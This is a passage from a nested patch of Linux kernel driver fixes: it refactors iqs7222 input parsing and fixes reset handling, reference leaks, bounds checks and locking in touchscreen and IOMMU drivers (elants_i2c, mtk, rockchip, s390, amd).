+-		iqs7222->kp_type[chan_index][i] = EV_KEY;
+-
+-		if (fwnode_property_present(event_node, "linux,input-type")) {
+-			error = fwnode_property_read_u32(event_node,
+-							 "linux,input-type",
+-							 &val);
+-			if (error) {
+-				dev_err(&client->dev,
+-					"Failed to read %s input type: %d\n",
+-					fwnode_get_name(chan_node), error);
+-				return error;
+-			}
+-
+-			if (val != EV_KEY && val != EV_SW) {
+-				dev_err(&client->dev,
+-					"Invalid %s input type: %u\n",
+-					fwnode_get_name(chan_node), val);
+-				return -EINVAL;
+-			}
+-
+-			iqs7222->kp_type[chan_index][i] = val;
+-		}
+-
+-		/*
+-		 * Reference channels can opt out of event reporting by using
+-		 * KEY_RESERVED in place of a true key or switch code.
+-		 */
+-		if (iqs7222->kp_type[chan_index][i] == EV_KEY &&
+-		    iqs7222->kp_code[chan_index][i] == KEY_RESERVED)
+-			continue;
+-
+-		input_set_capability(iqs7222->keypad,
+-				     iqs7222->kp_type[chan_index][i],
+-				     iqs7222->kp_code[chan_index][i]);
++		error = iqs7222_parse_event(iqs7222, event_node, chan_index,
++					    IQS7222_REG_GRP_BTN,
++					    iqs7222_kp_events[i].reg_key,
++					    BIT(chan_index),
++					    dev_desc->touch_link - (i ? 0 : 2),
++					    &iqs7222->kp_type[chan_index][i],
++					    &iqs7222->kp_code[chan_index][i]);
++		fwnode_handle_put(event_node);
++		if (error)
++			return error;
+ 
+ 		if (!dev_desc->event_offset)
+ 			continue;
+@@ -1981,16 +2048,16 @@ static int iqs7222_parse_chan(struct iqs7222_private *iqs7222, int chan_index)
+ 	 * The following call handles a special pair of properties that apply
+ 	 * to a channel node, but reside within the button (event) group.
+ 	 */
+-	return iqs7222_parse_props(iqs7222, &chan_node, chan_index,
++	return iqs7222_parse_props(iqs7222, chan_node, chan_index,
+ 				   IQS7222_REG_GRP_BTN,
+ 				   IQS7222_REG_KEY_DEBOUNCE);
+ }
+ 
+-static int iqs7222_parse_sldr(struct iqs7222_private *iqs7222, int sldr_index)
++static int iqs7222_parse_sldr(struct iqs7222_private *iqs7222,
++			      struct fwnode_handle *sldr_node, int sldr_index)
+ {
+ 	const struct iqs7222_dev_desc *dev_desc = iqs7222->dev_desc;
+ 	struct i2c_client *client = iqs7222->client;
+-	struct fwnode_handle *sldr_node = NULL;
+ 	int num_chan = dev_desc->reg_grps[IQS7222_REG_GRP_CHAN].num_row;
+ 	int ext_chan = rounddown(num_chan, 10);
+ 	int count, error, reg_offset, i;
+@@ -1998,15 +2065,6 @@ static int iqs7222_parse_sldr(struct iqs7222_private *iqs7222, int sldr_index)
+ 	u16 *sldr_setup = iqs7222->sldr_setup[sldr_index];
+ 	unsigned int chan_sel[4], val;
+ 
+-	error = iqs7222_parse_props(iqs7222, &sldr_node, sldr_index,
+-				    IQS7222_REG_GRP_SLDR,
+-				    IQS7222_REG_KEY_NONE);
+-	if (error)
+-		return error;
+-
+-	if (!sldr_node)
+-		return 0;
+-
+ 	/*
+ 	 * Each slider can be spread across 3 to 4 channels. It is possible to
+ 	 * select only 2 channels, but doing so prevents the slider from using
+@@ -2065,8 +2123,9 @@ static int iqs7222_parse_sldr(struct iqs7222_private *iqs7222, int sldr_index)
+ 	if (fwnode_property_present(sldr_node, "azoteq,use-prox"))
+ 		sldr_setup[4 + reg_offset] -= 2;
+ 
+-	if (!fwnode_property_read_u32(sldr_node, "azoteq,slider-size", &val)) {
+-		if (!val || val > dev_desc->sldr_res) {
++	error = fwnode_property_read_u32(sldr_node, "azoteq,slider-size", &val);
++	if (!error) {
++		if (val > dev_desc->sldr_res) {
+ 			dev_err(&client->dev, "Invalid %s size: %u\n",
+ 				fwnode_get_name(sldr_node), val);
+ 			return -EINVAL;
+@@ -2079,9 +2138,21 @@ static int iqs7222_parse_sldr(struct iqs7222_private *iqs7222, int sldr_index)
+ 			sldr_setup[2] |= (val / 16 <<
+ 					  IQS7222_SLDR_SETUP_2_RES_SHIFT);
+ 		}
++	} else if (error != -EINVAL) {
++		dev_err(&client->dev, "Failed to read %s size: %d\n",
++			fwnode_get_name(sldr_node), error);
++		return error;
+ 	}
+ 
+-	if (!fwnode_property_read_u32(sldr_node, "azoteq,top-speed", &val)) {
++	if (!(reg_offset ? sldr_setup[3]
++			 : sldr_setup[2] & IQS7222_SLDR_SETUP_2_RES_MASK)) {
++		dev_err(&client->dev, "Undefined %s size\n",
++			fwnode_get_name(sldr_node));
++		return -EINVAL;
++	}
++
++	error = fwnode_property_read_u32(sldr_node, "azoteq,top-speed", &val);
++	if (!error) {
+ 		if (val > (reg_offset ? U16_MAX : U8_MAX * 4)) {
+ 			dev_err(&client->dev, "Invalid %s top speed: %u\n",
+ 				fwnode_get_name(sldr_node), val);
+@@ -2094,9 +2165,14 @@ static int iqs7222_parse_sldr(struct iqs7222_private *iqs7222, int sldr_index)
+ 			sldr_setup[2] &= ~IQS7222_SLDR_SETUP_2_TOP_SPEED_MASK;
+ 			sldr_setup[2] |= (val / 4);
+ 		}
++	} else if (error != -EINVAL) {
++		dev_err(&client->dev, "Failed to read %s top speed: %d\n",
++			fwnode_get_name(sldr_node), error);
++		return error;
+ 	}
+ 
+-	if (!fwnode_property_read_u32(sldr_node, "linux,axis", &val)) {
++	error = fwnode_property_read_u32(sldr_node, "linux,axis", &val);
++	if (!error) {
+ 		u16 sldr_max = sldr_setup[3] - 1;
+ 
+ 		if (!reg_offset) {
+@@ -2110,6 +2186,10 @@ static int iqs7222_parse_sldr(struct iqs7222_private *iqs7222, int sldr_index)
+ 
+ 		input_set_abs_params(iqs7222->keypad, val, 0, sldr_max, 0, 0);
+ 		iqs7222->sl_axis[sldr_index] = val;
++	} else if (error != -EINVAL) {
++		dev_err(&client->dev, "Failed to read %s axis: %d\n",
++			fwnode_get_name(sldr_node), error);
++		return error;
+ 	}
+ 
+ 	if (dev_desc->wheel_enable) {
+@@ -2130,46 +2210,47 @@ static int iqs7222_parse_sldr(struct iqs7222_private *iqs7222, int sldr_index)
+ 	for (i = 0; i < ARRAY_SIZE(iqs7222_sl_events); i++) {
+ 		const char *event_name = iqs7222_sl_events[i].name;
+ 		struct fwnode_handle *event_node;
++		enum iqs7222_reg_key_id reg_key;
+ 
+ 		event_node = fwnode_get_named_child_node(sldr_node, event_name);
+ 		if (!event_node)
+ 			continue;
+ 
+-		error = iqs7222_parse_props(iqs7222, &event_node, sldr_index,
+-					    IQS7222_REG_GRP_SLDR,
+-					    reg_offset ?
+-					    IQS7222_REG_KEY_RESERVED :
+-					    iqs7222_sl_events[i].reg_key);
+-		if (error)
+-			return error;
++		/*
++		 * Depending on the device, gestures are either offered using
++		 * one of two timing resolutions, or are not supported at all.
++		 */
++		if (reg_offset)
++			reg_key = IQS7222_REG_KEY_RESERVED;
++		else if (dev_desc->legacy_gesture &&
++			 iqs7222_sl_events[i].reg_key == IQS7222_REG_KEY_TAP)
++			reg_key = IQS7222_REG_KEY_TAP_LEGACY;
++		else if (dev_desc->legacy_gesture &&
++			 iqs7222_sl_events[i].reg_key == IQS7222_REG_KEY_AXIAL)
++			reg_key = IQS7222_REG_KEY_AXIAL_LEGACY;
++		else
++			reg_key = iqs7222_sl_events[i].reg_key;
+ 
+ 		/*
+ 		 * The press/release event does not expose a direct GPIO link,
+ 		 * but one can be emulated by tying each of the participating
+ 		 * channels to the same GPIO.
+ 		 */
+-		error = iqs7222_gpio_select(iqs7222, event_node,
++		error = iqs7222_parse_event(iqs7222, event_node, sldr_index,
++					    IQS7222_REG_GRP_SLDR, reg_key,
+ 					    i ? iqs7222_sl_events[i].enable
+ 					      : sldr_setup[3 + reg_offset],
+ 					    i ? 1568 + sldr_index * 30
+-					      : sldr_setup[4 + reg_offset]);
++					      : sldr_setup[4 + reg_offset],
++					    NULL,
++					    &iqs7222->sl_code[sldr_index][i]);
++		fwnode_handle_put(event_node);
+ 		if (error)
+ 			return error;
+ 
+ 		if (!reg_offset)
+ 			sldr_setup[9] |= iqs7222_sl_events[i].enable;
+ 
+-		error = fwnode_property_read_u32(event_node, "linux,code",
+-						 &val);
+-		if (error) {
+-			dev_err(&client->dev, "Failed to read %s code: %d\n",
+-				fwnode_get_name(sldr_node), error);
+-			return error;
+-		}
+-
+-		iqs7222->sl_code[sldr_index][i] = val;
+-		input_set_capability(iqs7222->keypad, EV_KEY, val);
+-
+ 		if (!dev_desc->event_offset)
+ 			continue;
+ 
+@@ -2190,19 +2271,63 @@ static int iqs7222_parse_sldr(struct iqs7222_private *iqs7222, int sldr_index)
+ 	 * The following call handles a special pair of properties that shift
+ 	 * to make room for a wheel enable control in the case of IQS7222C.
+ 	 */
+-	return iqs7222_parse_props(iqs7222, &sldr_node, sldr_index,
++	return iqs7222_parse_props(iqs7222, sldr_node, sldr_index,
+ 				   IQS7222_REG_GRP_SLDR,
+ 				   dev_desc->wheel_enable ?
+ 				   IQS7222_REG_KEY_WHEEL :
+ 				   IQS7222_REG_KEY_NO_WHEEL);
+ }
+ 
++static int (*iqs7222_parse_extra[IQS7222_NUM_REG_GRPS])
++				(struct iqs7222_private *iqs7222,
++				 struct fwnode_handle *reg_grp_node,
++				 int reg_grp_index) = {
++	[IQS7222_REG_GRP_CYCLE] = iqs7222_parse_cycle,
++	[IQS7222_REG_GRP_CHAN] = iqs7222_parse_chan,
++	[IQS7222_REG_GRP_SLDR] = iqs7222_parse_sldr,
++};
++
++static int iqs7222_parse_reg_grp(struct iqs7222_private *iqs7222,
++				 enum iqs7222_reg_grp_id reg_grp,
++				 int reg_grp_index)
++{
++	struct i2c_client *client = iqs7222->client;
++	struct fwnode_handle *reg_grp_node;
++	int error;
++
++	if (iqs7222_reg_grp_names[reg_grp]) {
++		char reg_grp_name[16];
++
++		snprintf(reg_grp_name, sizeof(reg_grp_name), "%s-%d",
++			 iqs7222_reg_grp_names[reg_grp], reg_grp_index);
++
++		reg_grp_node = device_get_named_child_node(&client->dev,
++							   reg_grp_name);
++	} else {
++		reg_grp_node = fwnode_handle_get(dev_fwnode(&client->dev));
++	}
++
++	if (!reg_grp_node)
++		return 0;
++
++	error = iqs7222_parse_props(iqs7222, reg_grp_node, reg_grp_index,
++				    reg_grp, IQS7222_REG_KEY_NONE);
++
++	if (!error && iqs7222_parse_extra[reg_grp])
++		error = iqs7222_parse_extra[reg_grp](iqs7222, reg_grp_node,
++						     reg_grp_index);
++
++	fwnode_handle_put(reg_grp_node);
++
++	return error;
++}
++
+ static int iqs7222_parse_all(struct iqs7222_private *iqs7222)
+ {
+ 	const struct iqs7222_dev_desc *dev_desc = iqs7222->dev_desc;
+ 	const struct iqs7222_reg_grp_desc *reg_grps = dev_desc->reg_grps;
+ 	u16 *sys_setup = iqs7222->sys_setup;
+-	int error, i;
++	int error, i, j;
+ 
+ 	if (dev_desc->allow_offset)
+ 		sys_setup[dev_desc->allow_offset] = U16_MAX;
+@@ -2210,32 +2335,13 @@ static int iqs7222_parse_all(struct iqs7222_private *iqs7222)
+ 	if (dev_desc->event_offset)
+ 		sys_setup[dev_desc->event_offset] = IQS7222_EVENT_MASK_ATI;
+ 
+-	for (i = 0; i < reg_grps[IQS7222_REG_GRP_CYCLE].num_row; i++) {
+-		error = iqs7222_parse_cycle(iqs7222, i);
+-		if (error)
+-			return error;
+-	}
+-
+-	error = iqs7222_parse_props(iqs7222, NULL, 0, IQS7222_REG_GRP_GLBL,
+-				    IQS7222_REG_KEY_NONE);
+-	if (error)
+-		return error;
+-
+ 	for (i = 0; i < reg_grps[IQS7222_REG_GRP_GPIO].num_row; i++) {
+-		struct fwnode_handle *gpio_node = NULL;
+ 		u16 *gpio_setup = iqs7222->gpio_setup[i];
+-		int j;
+ 
+ 		gpio_setup[0] &= ~IQS7222_GPIO_SETUP_0_GPIO_EN;
+ 		gpio_setup[1] = 0;
+ 		gpio_setup[2] = 0;
+ 
+-		error = iqs7222_parse_props(iqs7222, &gpio_node, i,
+-					    IQS7222_REG_GRP_GPIO,
+-					    IQS7222_REG_KEY_NONE);
+-		if (error)
+-			return error;
+-
+ 		if (reg_grps[IQS7222_REG_GRP_GPIO].num_row == 1)
+ 			continue;
+ 
+@@ -2258,29 +2364,21 @@ static int iqs7222_parse_all(struct iqs7222_private *iqs7222)
+ 		chan_setup[5] = 0;
+ 	}
+ 
+-	for (i = 0; i < reg_grps[IQS7222_REG_GRP_CHAN].num_row; i++) {
+-		error = iqs7222_parse_chan(iqs7222, i);
+-		if (error)
+-			return error;
+-	}
+-
+-	error = iqs7222_parse_props(iqs7222, NULL, 0, IQS7222_REG_GRP_FILT,
+-				    IQS7222_REG_KEY_NONE);
+-	if (error)
+-		return error;
+-
+ 	for (i = 0; i < reg_grps[IQS7222_REG_GRP_SLDR].num_row; i++) {
+ 		u16 *sldr_setup = iqs7222->sldr_setup[i];
+ 
+ 		sldr_setup[0] &= ~IQS7222_SLDR_SETUP_0_CHAN_CNT_MASK;
++	}
+ 
+-		error = iqs7222_parse_sldr(iqs7222, i);
+-		if (error)
+-			return error;
++	for (i = 0; i < IQS7222_NUM_REG_GRPS; i++) {
++		for (j = 0; j < reg_grps[i].num_row; j++) {
++			error = iqs7222_parse_reg_grp(iqs7222, i, j);
++			if (error)
++				return error;
++		}
+ 	}
+ 
+-	return iqs7222_parse_props(iqs7222, NULL, 0, IQS7222_REG_GRP_SYS,
+-				   IQS7222_REG_KEY_NONE);
++	return 0;
+ }
+ 
+ static int iqs7222_report(struct iqs7222_private *iqs7222)
+diff --git a/drivers/input/touchscreen/elants_i2c.c b/drivers/input/touchscreen/elants_i2c.c
+index 879a4d984c907..e1308e179dd6f 100644
+--- a/drivers/input/touchscreen/elants_i2c.c
++++ b/drivers/input/touchscreen/elants_i2c.c
+@@ -1329,14 +1329,12 @@ static int elants_i2c_power_on(struct elants_data *ts)
+ 	if (IS_ERR_OR_NULL(ts->reset_gpio))
+ 		return 0;
+ 
+-	gpiod_set_value_cansleep(ts->reset_gpio, 1);
+-
+ 	error = regulator_enable(ts->vcc33);
+ 	if (error) {
+ 		dev_err(&ts->client->dev,
+ 			"failed to enable vcc33 regulator: %d\n",
+ 			error);
+-		goto release_reset_gpio;
++		return error;
+ 	}
+ 
+ 	error = regulator_enable(ts->vccio);
+@@ -1345,7 +1343,7 @@ static int elants_i2c_power_on(struct elants_data *ts)
+ 			"failed to enable vccio regulator: %d\n",
+ 			error);
+ 		regulator_disable(ts->vcc33);
+-		goto release_reset_gpio;
++		return error;
+ 	}
+ 
+ 	/*
+@@ -1354,7 +1352,6 @@ static int elants_i2c_power_on(struct elants_data *ts)
+ 	 */
+ 	udelay(ELAN_POWERON_DELAY_USEC);
+ 
+-release_reset_gpio:
+ 	gpiod_set_value_cansleep(ts->reset_gpio, 0);
+ 	if (error)
+ 		return error;
+@@ -1462,7 +1459,7 @@ static int elants_i2c_probe(struct i2c_client *client)
+ 		return error;
+ 	}
+ 
+-	ts->reset_gpio = devm_gpiod_get(&client->dev, "reset", GPIOD_OUT_LOW);
++	ts->reset_gpio = devm_gpiod_get(&client->dev, "reset", GPIOD_OUT_HIGH);
+ 	if (IS_ERR(ts->reset_gpio)) {
+ 		error = PTR_ERR(ts->reset_gpio);
+ 
+diff --git a/drivers/interconnect/qcom/sc7180.c b/drivers/interconnect/qcom/sc7180.c
+index 35cd448efdfbe..82d5e8a8c19ea 100644
+--- a/drivers/interconnect/qcom/sc7180.c
++++ b/drivers/interconnect/qcom/sc7180.c
+@@ -369,7 +369,7 @@ static const struct qcom_icc_desc sc7180_gem_noc = {
+ 	.num_bcms = ARRAY_SIZE(gem_noc_bcms),
+ };
+ 
+-static struct qcom_icc_bcm *mc_virt_bcms[] = {
++static struct qcom_icc_bcm * const mc_virt_bcms[] = {
+ 	&bcm_acv,
+ 	&bcm_mc0,
+ };
+diff --git a/drivers/iommu/amd/iommu_v2.c b/drivers/iommu/amd/iommu_v2.c
+index 6a1f02c62dffc..9f7fab49a5a90 100644
+--- a/drivers/iommu/amd/iommu_v2.c
++++ b/drivers/iommu/amd/iommu_v2.c
+@@ -587,6 +587,7 @@ out_drop_state:
+ 	put_device_state(dev_state);
+ 
+ out:
++	pci_dev_put(pdev);
+ 	return ret;
+ }
+ 
+diff --git a/drivers/iommu/fsl_pamu.c b/drivers/iommu/fsl_pamu.c
+index 0d03f837a5d4e..7a1a413f75ab2 100644
+--- a/drivers/iommu/fsl_pamu.c
++++ b/drivers/iommu/fsl_pamu.c
+@@ -868,7 +868,7 @@ static int fsl_pamu_probe(struct platform_device *pdev)
+ 		ret = create_csd(ppaact_phys, mem_size, csd_port_id);
+ 		if (ret) {
+ 			dev_err(dev, "could not create coherence subdomain\n");
+-			return ret;
++			goto error;
+ 		}
+ 	}
+ 
+diff --git a/drivers/iommu/iommu.c b/drivers/iommu/iommu.c
+index 65a3b3d886dc0..959d895fc1dff 100644
+--- a/drivers/iommu/iommu.c
++++ b/drivers/iommu/iommu.c
+@@ -283,13 +283,23 @@ static int __iommu_probe_device(struct device *dev, struct list_head *group_list
+ 	const struct iommu_ops *ops = dev->bus->iommu_ops;
+ 	struct iommu_device *iommu_dev;
+ 	struct iommu_group *group;
++	static DEFINE_MUTEX(iommu_probe_device_lock);
+ 	int ret;
+ 
+ 	if (!ops)
+ 		return -ENODEV;
+-
+-	if (!dev_iommu_get(dev))
+-		return -ENOMEM;
++	/*
++	 * Serialise to avoid races between IOMMU drivers registering in
++	 * parallel and/or the "replay" calls from ACPI/OF code via client
++	 * driver probe. Once the latter have been cleaned up we should
++	 * probably be able to use device_lock() here to minimise the scope,
++	 * but for now enforcing a simple global ordering is fine.
++	 */
++	mutex_lock(&iommu_probe_device_lock);
++	if (!dev_iommu_get(dev)) {
++		ret = -ENOMEM;
++		goto err_unlock;
++	}
+ 
+ 	if (!try_module_get(ops->owner)) {
+ 		ret = -EINVAL;
+@@ -309,11 +319,14 @@ static int __iommu_probe_device(struct device *dev, struct list_head *group_list
+ 		ret = PTR_ERR(group);
+ 		goto out_release;
+ 	}
+-	iommu_group_put(group);
+ 
++	mutex_lock(&group->mutex);
+ 	if (group_list && !group->default_domain && list_empty(&group->entry))
+ 		list_add_tail(&group->entry, group_list);
++	mutex_unlock(&group->mutex);
++	iommu_group_put(group);
+ 
++	mutex_unlock(&iommu_probe_device_lock);
+ 	iommu_device_link(iommu_dev, dev);
+ 
+ 	return 0;
+@@ -328,6 +341,9 @@ out_module_put:
+ err_free:
+ 	dev_iommu_free(dev);
+ 
++err_unlock:
++	mutex_unlock(&iommu_probe_device_lock);
++
+ 	return ret;
+ }
+ 
+@@ -1799,11 +1815,11 @@ int bus_iommu_probe(struct bus_type *bus)
+ 		return ret;
+ 
+ 	list_for_each_entry_safe(group, next, &group_list, entry) {
++		mutex_lock(&group->mutex);
++
+ 		/* Remove item from the list */
+ 		list_del_init(&group->entry);
+ 
+-		mutex_lock(&group->mutex);
+-
+ 		/* Try to allocate default domain */
+ 		probe_alloc_default_domain(bus, group);
+ 
+diff --git a/drivers/iommu/mtk_iommu.c b/drivers/iommu/mtk_iommu.c
+index 2ab2ecfe01f80..dad2f238ffbf2 100644
+--- a/drivers/iommu/mtk_iommu.c
++++ b/drivers/iommu/mtk_iommu.c
+@@ -1044,20 +1044,24 @@ static int mtk_iommu_mm_dts_parse(struct device *dev, struct component_match **m
+ 				  struct mtk_iommu_data *data)
+ {
+ 	struct device_node *larbnode, *smicomm_node, *smi_subcomm_node;
+-	struct platform_device *plarbdev;
++	struct platform_device *plarbdev, *pcommdev;
+ 	struct device_link *link;
+ 	int i, larb_nr, ret;
+ 
+ 	larb_nr = of_count_phandle_with_args(dev->of_node, "mediatek,larbs", NULL);
+ 	if (larb_nr < 0)
+ 		return larb_nr;
++	if (larb_nr == 0 || larb_nr > MTK_LARB_NR_MAX)
++		return -EINVAL;
+ 
+ 	for (i = 0; i < larb_nr; i++) {
+ 		u32 id;
+ 
+ 		larbnode = of_parse_phandle(dev->of_node, "mediatek,larbs", i);
+-		if (!larbnode)
+-			return -EINVAL;
++		if (!larbnode) {
++			ret = -EINVAL;
++			goto err_larbdev_put;
++		}
+ 
+ 		if (!of_device_is_available(larbnode)) {
+ 			of_node_put(larbnode);
+@@ -1067,20 +1071,32 @@ static int mtk_iommu_mm_dts_parse(struct device *dev, struct component_match **m
+ 		ret = of_property_read_u32(larbnode, "mediatek,larb-id", &id);
+ 		if (ret)/* The id is consecutive if there is no this property */
+ 			id = i;
++		if (id >= MTK_LARB_NR_MAX) {
++			of_node_put(larbnode);
++			ret = -EINVAL;
++			goto err_larbdev_put;
++		}
+ 
+ 		plarbdev = of_find_device_by_node(larbnode);
++		of_node_put(larbnode);
+ 		if (!plarbdev) {
+-			of_node_put(larbnode);
+-			return -ENODEV;
++			ret = -ENODEV;
++			goto err_larbdev_put;
+ 		}
+-		if (!plarbdev->dev.driver) {
+-			of_node_put(larbnode);
+-			return -EPROBE_DEFER;
++		if (data->larb_imu[id].dev) {
++			platform_device_put(plarbdev);
++			ret = -EEXIST;
++			goto err_larbdev_put;
+ 		}
+ 		data->larb_imu[id].dev = &plarbdev->dev;
+ 
+-		component_match_add_release(dev, match, component_release_of,
+-					    component_compare_of, larbnode);
++		if (!plarbdev->dev.driver) {
++			ret = -EPROBE_DEFER;
++			goto err_larbdev_put;
++		}
++
++		component_match_add(dev, match, component_compare_dev, &plarbdev->dev);
++		platform_device_put(plarbdev);
+ 	}
+ 
+ 	/* Get smi-(sub)-common dev from the last larb. */
+@@ -1098,17 +1114,28 @@ static int mtk_iommu_mm_dts_parse(struct device *dev, struct component_match **m
+ 	else
+ 		smicomm_node = smi_subcomm_node;
+ 
+-	plarbdev = of_find_device_by_node(smicomm_node);
++	pcommdev = of_find_device_by_node(smicomm_node);
+ 	of_node_put(smicomm_node);
+-	data->smicomm_dev = &plarbdev->dev;
++	if (!pcommdev)
++		return -ENODEV;
++	data->smicomm_dev = &pcommdev->dev;
+ 
+ 	link = device_link_add(data->smicomm_dev, dev,
+ 			       DL_FLAG_STATELESS | DL_FLAG_PM_RUNTIME);
++	platform_device_put(pcommdev);
+ 	if (!link) {
+ 		dev_err(dev, "Unable to link %s.\n", dev_name(data->smicomm_dev));
+ 		return -EINVAL;
+ 	}
+ 	return 0;
++
++err_larbdev_put:
++	for (i = MTK_LARB_NR_MAX - 1; i >= 0; i--) {
++		if (!data->larb_imu[i].dev)
++			continue;
++		put_device(data->larb_imu[i].dev);
++	}
++	return ret;
+ }
+ 
+ static int mtk_iommu_probe(struct platform_device *pdev)
+@@ -1173,6 +1200,8 @@ static int mtk_iommu_probe(struct platform_device *pdev)
+ 
+ 	banks_num = data->plat_data->banks_num;
+ 	res = platform_get_resource(pdev, IORESOURCE_MEM, 0);
++	if (!res)
++		return -EINVAL;
+ 	if (resource_size(res) < banks_num * MTK_IOMMU_BANK_SZ) {
+ 		dev_err(dev, "banknr %d. res %pR is not enough.\n", banks_num, res);
+ 		return -EINVAL;
+diff --git a/drivers/iommu/rockchip-iommu.c b/drivers/iommu/rockchip-iommu.c
+index a3fc59b814ab5..a68eadd64f38d 100644
+--- a/drivers/iommu/rockchip-iommu.c
++++ b/drivers/iommu/rockchip-iommu.c
+@@ -280,19 +280,17 @@ static u32 rk_mk_pte(phys_addr_t page, int prot)
+  *  11:9 - Page address bit 34:32
+  *   8:4 - Page address bit 39:35
+  *     3 - Security
+- *     2 - Readable
+- *     1 - Writable
++ *     2 - Writable
++ *     1 - Readable
+  *     0 - 1 if Page @ Page address is valid
+  */
+-#define RK_PTE_PAGE_READABLE_V2      BIT(2)
+-#define RK_PTE_PAGE_WRITABLE_V2      BIT(1)
+ 
+ static u32 rk_mk_pte_v2(phys_addr_t page, int prot)
+ {
+ 	u32 flags = 0;
+ 
+-	flags |= (prot & IOMMU_READ) ? RK_PTE_PAGE_READABLE_V2 : 0;
+-	flags |= (prot & IOMMU_WRITE) ? RK_PTE_PAGE_WRITABLE_V2 : 0;
++	flags |= (prot & IOMMU_READ) ? RK_PTE_PAGE_READABLE : 0;
++	flags |= (prot & IOMMU_WRITE) ? RK_PTE_PAGE_WRITABLE : 0;
+ 
+ 	return rk_mk_dte_v2(page) | flags;
+ }
+diff --git a/drivers/iommu/s390-iommu.c b/drivers/iommu/s390-iommu.c
+index 3c071782f6f16..c2e5e81d609e1 100644
+--- a/drivers/iommu/s390-iommu.c
++++ b/drivers/iommu/s390-iommu.c
+@@ -79,10 +79,36 @@ static void s390_domain_free(struct iommu_domain *domain)
+ {
+ 	struct s390_domain *s390_domain = to_s390_domain(domain);
+ 
++	WARN_ON(!list_empty(&s390_domain->devices));
+ 	dma_cleanup_tables(s390_domain->dma_table);
+ 	kfree(s390_domain);
+ }
+ 
++static void __s390_iommu_detach_device(struct zpci_dev *zdev)
++{
++	struct s390_domain *s390_domain = zdev->s390_domain;
++	struct s390_domain_device *domain_device, *tmp;
++	unsigned long flags;
++
++	if (!s390_domain)
++		return;
++
++	spin_lock_irqsave(&s390_domain->list_lock, flags);
++	list_for_each_entry_safe(domain_device, tmp, &s390_domain->devices,
++				 list) {
++		if (domain_device->zdev == zdev) {
++			list_del(&domain_device->list);
++			kfree(domain_device);
++			break;
++		}
++	}
++	spin_unlock_irqrestore(&s390_domain->list_lock, flags);
++
++	zpci_unregister_ioat(zdev, 0);
++	zdev->s390_domain = NULL;
++	zdev->dma_table = NULL;
++}
++
+ static int s390_iommu_attach_device(struct iommu_domain *domain,
+ 				    struct device *dev)
+ {
+@@ -90,7 +116,7 @@ static int s390_iommu_attach_device(struct iommu_domain *domain,
+ 	struct zpci_dev *zdev = to_zpci_dev(dev);
+ 	struct s390_domain_device *domain_device;
+ 	unsigned long flags;
+-	int cc, rc;
++	int cc, rc = 0;
+ 
+ 	if (!zdev)
+ 		return -ENODEV;
+@@ -99,24 +125,18 @@ static int s390_iommu_attach_device(struct iommu_domain *domain,
+ 	if (!domain_device)
+ 		return -ENOMEM;
+ 
+-	if (zdev->dma_table && !zdev->s390_domain) {
+-		cc = zpci_dma_exit_device(zdev);
+-		if (cc) {
+-			rc = -EIO;
+-			goto out_free;
+-		}
+-	}
+-
+ 	if (zdev->s390_domain)
+-		zpci_unregister_ioat(zdev, 0);
++		__s390_iommu_detach_device(zdev);
++	else if (zdev->dma_table)
++		zpci_dma_exit_device(zdev);
+ 
+-	zdev->dma_table = s390_domain->dma_table;
+ 	cc = zpci_register_ioat(zdev, 0, zdev->start_dma, zdev->end_dma,
+-				virt_to_phys(zdev->dma_table));
++				virt_to_phys(s390_domain->dma_table));
+ 	if (cc) {
+ 		rc = -EIO;
+-		goto out_restore;
++		goto out_free;
+ 	}
++	zdev->dma_table = s390_domain->dma_table;
+ 
+ 	spin_lock_irqsave(&s390_domain->list_lock, flags);
+ 	/* First device defines the DMA range limits */
+@@ -127,9 +147,9 @@ static int s390_iommu_attach_device(struct iommu_domain *domain,
+ 	/* Allow only devices with identical DMA range limits */
+ 	} else if (domain->geometry.aperture_start != zdev->start_dma ||
+ 		   domain->geometry.aperture_end != zdev->end_dma) {
+-		rc = -EINVAL;
+ 		spin_unlock_irqrestore(&s390_domain->list_lock, flags);
+-		goto out_restore;
++		rc = -EINVAL;
++		goto out_unregister;
+ 	}
+ 	domain_device->zdev = zdev;
+ 	zdev->s390_domain = s390_domain;
+@@ -138,14 +158,9 @@ static int s390_iommu_attach_device(struct iommu_domain *domain,
+ 
+ 	return 0;
+ 
+-out_restore:
+-	if (!zdev->s390_domain) {
+-		zpci_dma_init_device(zdev);
+-	} else {
+-		zdev->dma_table = zdev->s390_domain->dma_table;
+-		zpci_register_ioat(zdev, 0, zdev->start_dma, zdev->end_dma,
+-				   virt_to_phys(zdev->dma_table));
+-	}
++out_unregister:
++	zpci_unregister_ioat(zdev, 0);
++	zdev->dma_table = NULL;
+ out_free:
+ 	kfree(domain_device);
+ 
+@@ -155,32 +170,12 @@ out_free:
+ static void s390_iommu_detach_device(struct iommu_domain *domain,
+ 				     struct device *dev)
+ {
+-	struct s390_domain *s390_domain = to_s390_domain(domain);
+ 	struct zpci_dev *zdev = to_zpci_dev(dev);
+-	struct s390_domain_device *domain_device, *tmp;
+-	unsigned long flags;
+-	int found = 0;
+ 
+-	if (!zdev)
+-		return;
++	WARN_ON(zdev->s390_domain != to_s390_domain(domain));
+ 
+-	spin_lock_irqsave(&s390_domain->list_lock, flags);
+-	list_for_each_entry_safe(domain_device, tmp, &s390_domain->devices,
+-				 list) {
+-		if (domain_device->zdev == zdev) {
+-			list_del(&domain_device->list);
+-			kfree(domain_device);
+-			found = 1;
+-			break;
+-		}
+-	}
+-	spin_unlock_irqrestore(&s390_domain->list_lock, flags);
+-
+-	if (found && (zdev->s390_domain == s390_domain)) {
+-		zdev->s390_domain = NULL;
+-		zpci_unregister_ioat(zdev, 0);
+-		zpci_dma_init_device(zdev);
+-	}
++	__s390_iommu_detach_device(zdev);
++	zpci_dma_init_device(zdev);
+ }
+ 
+ static struct iommu_device *s390_iommu_probe_device(struct device *dev)
+@@ -198,24 +193,13 @@ static struct iommu_device *s390_iommu_probe_device(struct device *dev)
+ static void s390_iommu_release_device(struct device *dev)
+ {
+ 	struct zpci_dev *zdev = to_zpci_dev(dev);
+-	struct iommu_domain *domain;
+ 
+ 	/*
+-	 * This is a workaround for a scenario where the IOMMU API common code
+-	 * "forgets" to call the detach_dev callback: After binding a device
+-	 * to vfio-pci and completing the VFIO_SET_IOMMU ioctl (which triggers
+-	 * the attach_dev), removing the device via
+-	 * "echo 1 > /sys/bus/pci/devices/.../remove" won't trigger detach_dev,
+-	 * only release_device will be called via the BUS_NOTIFY_REMOVED_DEVICE
+-	 * notifier.
+-	 *
+-	 * So let's call detach_dev from here if it hasn't been called before.
++	 * release_device is expected to detach any domain currently attached
++	 * to the device, but keep it attached to other devices in the group.
+ 	 */
